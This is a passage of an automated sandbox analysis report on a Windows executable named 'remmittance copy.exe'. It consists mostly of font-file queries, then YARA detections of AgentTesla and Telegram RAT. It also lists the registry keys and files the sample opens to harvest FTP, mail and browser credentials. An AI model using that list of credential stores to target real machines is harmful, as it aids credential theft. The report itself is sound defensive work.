                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Users\user\Desktop\remmittance copy.exe VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected Telegram RATShow sources
                      Source: Yara matchFile source: 00000005.00000002.924472986.00000000031A1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: remmittance copy.exe PID: 6336, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: remmittance copy.exe PID: 3864, type: MEMORYSTR
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 5.0.remmittance copy.exe.400000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.remmittance copy.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.remmittance copy.exe.400000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.remmittance copy.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.remmittance copy.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.remmittance copy.exe.400000.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.remmittance copy.exe.3b39030.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000000.679774428.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.678447633.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.678850422.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.679389493.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.923014189.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.682657468.00000000039E9000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.924472986.00000000031A1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: remmittance copy.exe PID: 6336, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: remmittance copy.exe PID: 3864, type: MEMORYSTR
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                      Source: C:\Users\user\Desktop\remmittance copy.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Tries to harvest and steal ftp login credentialsShow sources
                      Source: C:\Users\user\Desktop\remmittance copy.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                      Source: C:\Users\user\Desktop\remmittance copy.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                      Tries to steal Mail credentials (via file access)Show sources
                      Source: C:\Users\user\Desktop\remmittance copy.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\Desktop\remmittance copy.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\Desktop\remmittance copy.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: C:\Users\user\Desktop\remmittance copy.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Users\user\Desktop\remmittance copy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\Desktop\remmittance copy.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: Yara matchFile source: 00000005.00000002.924472986.00000000031A1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: remmittance copy.exe PID: 3864, type: MEMORYSTR

                      Remote Access Functionality:

                      barindex
                      Yara detected Telegram RATShow sources
                      Source: Yara matchFile source: 00000005.00000002.924472986.00000000031A1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: remmittance copy.exe PID: 6336, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: remmittance copy.exe PID: 3864, type: MEMORYSTR
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 5.0.remmittance copy.exe.400000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.remmittance copy.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.remmittance copy.exe.400000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.remmittance copy.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.remmittance copy.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.remmittance copy.exe.400000.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.remmittance copy.exe.3b39030.2.raw.unpack, type: UNPACKEDPE
